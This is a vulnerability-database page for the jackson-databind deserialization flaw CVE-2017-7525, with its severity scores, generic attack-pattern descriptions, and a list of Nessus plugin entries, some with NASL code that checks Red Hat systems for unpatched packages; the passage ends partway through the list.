Vulnerabilities > CVE-2017-7525 - Incomplete Blacklist vulnerability in multiple products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Command Delimiters An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
- Flash Parameter Injection An attacker injects values to global parameters into a Flash movie embedded in an HTML document. These injected parameters are controlled through arguments in the URL used to access the embedding HTML document. As such, this is a form of HTTP parameter injection, but the abilities granted to the Flash document (such as access to a page's document model, including associated cookies) make this attack more flexible. The injected parameters can allow the attacker to control other objects within the Flash movie as well as full control over the parent document's DOM model.
- Embedding Scripts in Non-Script Elements This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (<img>), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an attacker to tunnel through the application's elements and launch a XSS attack through other elements. As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote attacker to collect and interpret the output of said attack.
- Flash Injection An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.
- Using Leading 'Ghost' Character Sequences to Bypass Input Filters An attacker intentionally introduces leading characters that enable getting the input past the filters. The API that is being targeted, ignores the leading "ghost" characters, and therefore processes the attackers' input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API. Some APIs will strip certain leading characters from a string of parameters. Perhaps these characters are considered redundant, and for this reason they are removed. Another possibility is the parser logic at the beginning of analysis is specialized in some way that causes some characters to be removed. The attacker can specify multiple types of alternative encodings at the beginning of a string as a set of probes. One commonly used possibility involves adding ghost characters--extra characters that don't affect the validity of the request at the API layer. If the attacker has access to the API libraries being targeted, certain attack ideas can be tested directly in advance. Once alternative ghost encodings emerge through testing, the attacker can move from lab-based API testing to testing real-world service implementations.
Nessus
NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-0116.NASL description An update for rh-eclipse46-jackson-databind is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API. Security Fix(es) : * A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of ObjectMapper. This issue extends upon the previous flaws CVE-2017-7525 and CVE-2017-15095 by blacklisting more classes that could be used maliciously. (CVE-2017-17485) Red Hat would like to thank 0c0c0f from 360Guan Xing Shi Yan Shi for reporting this issue. last seen 2020-06-01 modified 2020-06-02 plugin id 109427 published 2018-04-30 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109427 title RHEL 7 : rh-eclipse46-jackson-databind (RHSA-2018:0116) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2018:0116. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(109427); script_version("1.7"); script_cvs_date("Date: 2019/10/24 15:35:44"); script_cve_id("CVE-2017-17485"); script_xref(name:"RHSA", value:"2018:0116"); script_name(english:"RHEL 7 : rh-eclipse46-jackson-databind (RHSA-2018:0116)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "An update for rh-eclipse46-jackson-databind is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API. Security Fix(es) : * A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of ObjectMapper. This issue extends upon the previous flaws CVE-2017-7525 and CVE-2017-15095 by blacklisting more classes that could be used maliciously. (CVE-2017-17485) Red Hat would like to thank 0c0c0f from 360Guan Xing Shi Yan Shi for reporting this issue." ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2018:0116" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-17485" ); script_set_attribute( attribute:"solution", value: "Update the affected rh-eclipse46-jackson-databind and / or rh-eclipse46-jackson-databind-javadoc packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rh-eclipse46-jackson-databind"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rh-eclipse46-jackson-databind-javadoc"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.3"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.4"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.5"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/01/10"); script_set_attribute(attribute:"patch_publication_date", value:"2018/01/23"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/30"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 7.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2018:0116"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (rpm_check(release:"RHEL7", reference:"rh-eclipse46-jackson-databind-2.6.3-2.6.el7")) flag++; if (rpm_check(release:"RHEL7", reference:"rh-eclipse46-jackson-databind-javadoc-2.6.3-2.6.el7")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "rh-eclipse46-jackson-databind / etc"); } }NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-1451.NASL description An update for jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 6.4 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). With this update, the jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 6.4.19. Security Fix(es) : * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485) * slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088) * Apache ActiveMQ Artemis: Deserialization of untrusted input vulnerability (CVE-2016-4978) * solr: Directory traversal via Index Replication HTTP API (CVE-2017-3163) * tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304) * jackson-databind: incomplete fix for CVE-2017-7525 permits unsafe serialization via c3p0 libraries (CVE-2018-7489) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-15095; 0c0c0f from 360Guan Xing Shi Yan Shi for reporting CVE-2017-17485; and Chris McCown for reporting CVE-2018-8088. last seen 2020-06-01 modified 2020-06-02 plugin id 109838 published 2018-05-16 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109838 title RHEL 6 : eap6-jboss-ec2-eap (RHSA-2018:1451) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2018:1451. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(109838); script_version("1.7"); script_cvs_date("Date: 2019/10/24 15:35:44"); script_cve_id("CVE-2016-4978", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-3163", "CVE-2018-1304", "CVE-2018-7489", "CVE-2018-8088"); script_xref(name:"RHSA", value:"2018:1451"); script_name(english:"RHEL 6 : eap6-jboss-ec2-eap (RHSA-2018:1451)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "An update for jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 6.4 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). With this update, the jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 6.4.19. Security Fix(es) : * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485) * slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088) * Apache ActiveMQ Artemis: Deserialization of untrusted input vulnerability (CVE-2016-4978) * solr: Directory traversal via Index Replication HTTP API (CVE-2017-3163) * tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304) * jackson-databind: incomplete fix for CVE-2017-7525 permits unsafe serialization via c3p0 libraries (CVE-2018-7489) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-15095; 0c0c0f from 360Guan Xing Shi Yan Shi for reporting CVE-2017-17485; and Chris McCown for reporting CVE-2018-8088." ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/documentation/en-us/" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2018:1451" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-4978" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-3163" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-15095" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2017-17485" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2018-1304" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2018-7489" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2018-8088" ); script_set_attribute( attribute:"solution", value: "Update the affected jboss-ec2-eap and / or jboss-ec2-eap-samples packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ec2-eap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:jboss-ec2-eap-samples"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/09/27"); script_set_attribute(attribute:"patch_publication_date", value:"2018/05/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/05/16"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 6.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2018:1451"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (rpm_check(release:"RHEL6", reference:"jboss-ec2-eap-7.5.20-1.Final_redhat_1.ep6.el6")) flag++; if (rpm_check(release:"RHEL6", reference:"jboss-ec2-eap-samples-7.5.20-1.Final_redhat_1.ep6.el6")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "jboss-ec2-eap / jboss-ec2-eap-samples"); } }NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-1449.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 6.4.20 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.19, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485) * slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088) * Apache ActiveMQ Artemis: Deserialization of untrusted input vulnerability (CVE-2016-4978) * solr: Directory traversal via Index Replication HTTP API (CVE-2017-3163) * tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304) * jackson-databind: incomplete fix for CVE-2017-7525 permits unsafe serialization via c3p0 libraries (CVE-2018-7489) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-15095; 0c0c0f from 360Guan Xing Shi Yan Shi for reporting CVE-2017-17485; and Chris McCown for reporting CVE-2018-8088. last seen 2020-06-01 modified 2020-06-02 plugin id 109906 published 2018-05-18 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109906 title RHEL 6 : JBoss EAP (RHSA-2018:1449) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-2927.NASL description An update is now available for Red Hat Satellite 6.4 for RHEL 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool. Security Fix(es) : * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095) * hornetq: XXE/SSRF in XPath selector (CVE-2015-3208) * bouncycastle: Information disclosure in GCMBlockCipher (CVE-2015-6644) * bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data (CVE-2016-1000338) * bouncycastle: Information leak in AESFastEngine class (CVE-2016-1000339) * bouncycastle: Information exposure in DSA signature generation via timing attack (CVE-2016-1000341) * bouncycastle: ECDSA improper validation of ASN.1 encoding of signature (CVE-2016-1000342) * bouncycastle: DHIES implementation allowed the use of ECB mode (CVE-2016-1000344) * bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack (CVE-2016-1000345) * bouncycastle: Other party DH public keys are not fully validated (CVE-2016-1000346) * bouncycastle: ECIES implementation allowed the use of ECB mode (CVE-2016-1000352) * logback: Serialization vulnerability in SocketServer and ServerSocketReceiver (CVE-2017-5929) * python-django: Open redirect and possible XSS attack via user-supplied numeric redirect URLs (CVE-2017-7233) * hibernate-validator: Privilege escalation when running under the security manager (CVE-2017-7536) * puppet: Environment leakage in puppet-agent (CVE-2017-10690) * Satellite 6: XSS in discovery rule filter autocomplete functionality (CVE-2017-12175) * foreman: Stored XSS in fact name or value (CVE-2017-15100) * pulp: sensitive credentials revealed through the API (CVE-2018-1090) * foreman: SQL injection due to improper handling of the widget id parameter (CVE-2018-1096) * foreman: Ovirt admin password exposed by foreman API (CVE-2018-1097) * django: Catastrophic backtracking in regular expressions via last seen 2020-06-01 modified 2020-06-02 plugin id 118185 published 2018-10-18 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/118185 title RHEL 7 : Satellite Server (RHSA-2018:2927) NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_93F8E0FFF33D11E8BE460019DBB15B3F.NASL description FasterXML jackson-databind before 2.8.11.1 and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath. last seen 2020-06-01 modified 2020-06-02 plugin id 119272 published 2018-11-29 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/119272 title FreeBSD : payara -- Default typing issue in Jackson Databind (93f8e0ff-f33d-11e8-be46-0019dbb15b3f) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-3458.NASL description An update for eap7-jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 6 and Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). With this update, the eap7-jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 7.1. Refer to the JBoss Enterprise Application Platform 7.1 Release Notes, linked to in the References section, for information on the most significant bug fixes and enhancements included in this release. Security Fix(es) : * A Denial of Service can be caused when a long request is sent to EAP 7. (CVE-2016-7046) * The jboss init script unsafe file handling resulting in local privilege escalation. (CVE-2016-8656) * A deserialization vulnerability via readValue method of ObjectMapper which allows arbitrary code execution. (CVE-2017-7525) * JMSObjectMessage deserializes potentially malicious objects allowing Remote Code Execution. (CVE-2016-4978) * Undertow is vulnerable to the injection of arbitrary HTTP headers, and also response splitting. (CVE-2016-4993) * The domain controller will not propagate its administrative RBAC configuration to some slaves leading to escalate their privileges. (CVE-2016-5406) * Internal IP address disclosed on redirect when request header Host field is not set. (CVE-2016-6311) * Potential EAP resource starvation DOS attack via GET requests for server log files. (CVE-2016-8627) * Inefficient Header Cache could cause denial of service. (CVE-2016-9589) * The log file viewer allows arbitrary file read to authenticated user via path traversal. (CVE-2017-2595) * HTTP Request smuggling vulnerability due to permitting invalid characters in HTTP requests. (CVE-2017-2666) * Websocket non clean close can cause IO thread to get stuck in a loop. (CVE-2017-2670) * Privilege escalation with security manager last seen 2020-06-01 modified 2020-06-02 plugin id 105252 published 2017-12-14 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105252 title RHEL 6 / 7 : eap7-jboss-ec2-eap (RHSA-2017:3458) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-1448.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 6.4.20 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.19, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485) * slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088) * Apache ActiveMQ Artemis: Deserialization of untrusted input vulnerability (CVE-2016-4978) * solr: Directory traversal via Index Replication HTTP API (CVE-2017-3163) * tomcat: Incorrect handling of empty string URL in security constraints can lead to unintended exposure of resources (CVE-2018-1304) * jackson-databind: incomplete fix for CVE-2017-7525 permits unsafe serialization via c3p0 libraries (CVE-2018-7489) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-15095; 0c0c0f from 360Guan Xing Shi Yan Shi for reporting CVE-2017-17485; and Chris McCown for reporting CVE-2018-8088. last seen 2020-06-01 modified 2020-06-02 plugin id 109905 published 2018-05-18 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109905 title RHEL 7 : JBoss EAP (RHSA-2018:1448) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-0342.NASL description An update for rh-maven35-jackson-databind is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API. Security Fix(es) : * A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525) * Further classes that an attacker could use to achieve code execution through deserialisation were discovered, and added to the blacklist introduced by CVE-2017-7525. (CVE-2017-15095, CVE-2017-17485) Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525 and CVE-2017-15095 and 0c0c0f from 360Guan Xing Shi Yan Shi for reporting CVE-2017-17485. last seen 2020-06-01 modified 2020-06-02 plugin id 109428 published 2018-04-30 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109428 title RHEL 7 : rh-maven35-jackson-databind (RHSA-2018:0342) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-0480.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.1.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.1.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174) * infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485) * resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561) * undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196) * undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048) * jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 108324 published 2018-03-14 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/108324 title RHEL 7 : JBoss EAP (RHSA-2018:0480) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-1525.NASL description An update for rhvm-appliance is now available for Red Hat Virtualization 4 for RHEL 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The RHV-M Virtual Appliance automates the process of installing and configuring the Red Hat Virtualization Manager. The appliance is available to download as an OVA file from the Customer Portal. The following packages have been upgraded to a later upstream version: rhvm-appliance (4.2). (BZ#1558801, BZ#1563545) Security Fix(es) : * python-paramiko: Authentication bypass in transport.py (CVE-2018-7750) * slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088) * 